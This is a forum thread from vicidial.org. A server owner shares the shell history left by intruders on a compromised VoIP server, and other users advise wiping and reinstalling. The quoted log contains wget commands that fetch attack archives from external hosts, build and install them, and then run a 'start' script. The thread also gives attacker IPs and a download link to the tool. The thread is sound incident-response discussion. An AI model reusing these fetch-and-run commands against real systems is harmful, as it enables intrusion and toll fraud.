vicidial.org

Suddenly I find below few command ran on my server , MUST BE by some hackers.. Now I changed password of root ..but what can be the implications of below commands ?

27 cd /etc/ppp
28 wget gsm-replica.com/allnoscan.tgz
29 tar zxvf allnoscan.tgz
30 cd aastra/
31 wget gsm-replica.com/fork.tgz
32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
37 cd ..
38 screen
39 cd ../polycom/
40 cp ../aastra/bios.txt bios.txt
41 screen
42 cd /etc/ppp/aastra/
43 vi vuln
44 rm -rf vuln
45 cd ../polycom/
46 vi vuln
47 rm -rf vuln
48 exit
49 ./start b 4
50 wget http://fs03n3.sendspace.com/dl/8f286c2d ... cb4a6/4e70 f0222f326731/n2u07y/e.zip
51 unzip e.zip
52 mv e.txt bios.txt
53 ./start b 4

I see a folder under etc folder as ppp , Can I delete it ?

Server was accessed from :

206.125.45.185

95.130.170.231

32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install

wipe your system and reinstall. they have added software to your system and that software could have done ANYTHING while running. you could have extra users, you could be running ip forwarding ... backup, wipe, reinstall, lockdown, restore. iptables whitelist access only.

Can I delete the PPP folder safely ?

Here is the fork file :

http://www.4shared.com/file/gzoJb9Ne/fork.html

the point from my earlier post is this:

their software, once running, could have done ANYTHING. it could have installed a rootkit, it could have changed your TTY settings to make anything with the word "free" in it Green ... seriously. Unless you find out what it did, anyone telling you that you can safely delete anything or ...? is "hoping" they are right, but the reality of the matter is that they logged into your system and ran an external application which they downloaded. If the app is still there, you could look it over. If it's an executable ... good luck with that. And remember they could have changed it after running it to cover their tracks.

Wipe it and start over (back up first!!!). Back up NOW. Especially your data.

Of course, you could just delete everything they created and "hope" ... but the results of that could be several thousand dollars in calls to australia on Wednesday at 4AM. In an hour.

And seriously, *I* have no intention of looking at something that someone like this uploaded into your server. I'm crazy, not ...

I agree with William. Do a clean reinstall. Safer and faster.

And I'm not saying fighting a virus isn't great sport ... but is it worth the risk and effort (both)?

10 years or so ago when most of the country (windows users anyway) got hit with that supervirus (ok, lots of places did), I got a heads-up call from a network admin that she had "a problem" with her network, and I should check ours, too. Turns out servers across the known universe were being hit. Her company called in "the pros", and my boss said "handle it, but it comes out of YOUR department's budget".

Her company's "Pro's" battled the virus, blew about $8000, lost that day's data, wiped all the workstations and servers clean and reinstalled all their software. Bear in mind, that we both had Norton installed. And updated.

*I* on the other hand (after learning that when the Pro's began to try to delete files and fight the virus ... it began do delete data and essential system files!), did that thing many forget in that moment. I initated a backup, and told everyone on the sales floor and admin offices to Keep Paper Copies of everything today.

As soon as the backup completed, I broke our connection to the Net (pissed off everyone, of course, but since we didn't have VOIP, it was not a big deal).

As soon as business closed for the night, I did another backup, and once again pulled out the DAT tapes as soon as they were done for storage (hoping they would not be corrupt).

Then I shut off every computer in the office by pulling the plug, including the servers.

Then I turned on the net.

Then I booted every machine from a Live Desktop (Demo!) CD one at a time, starting with the domain controller ... and scrubbed every computer in the office with "Housecall" and every other virus checker I could find until each one scanned clean.

Then I loaded up the new virus rules into Norton (apparently there was a new version for some reason) ... and restored the data and immediately scanned again.

*Poof* no loss of servers or systems or $8000 (but I worked well into the morning). Nobody took a pay cut. (I got the next day off due to unconsciousness.)

You ready to try to do that without Norton or Housecall? There are rootkit detectors for Linux. It should only take a few hours. Maybe.

Or you can just back up your mysql data (text file, no virus) and reinstall, then restore your data.

Up to you, though. Obviously.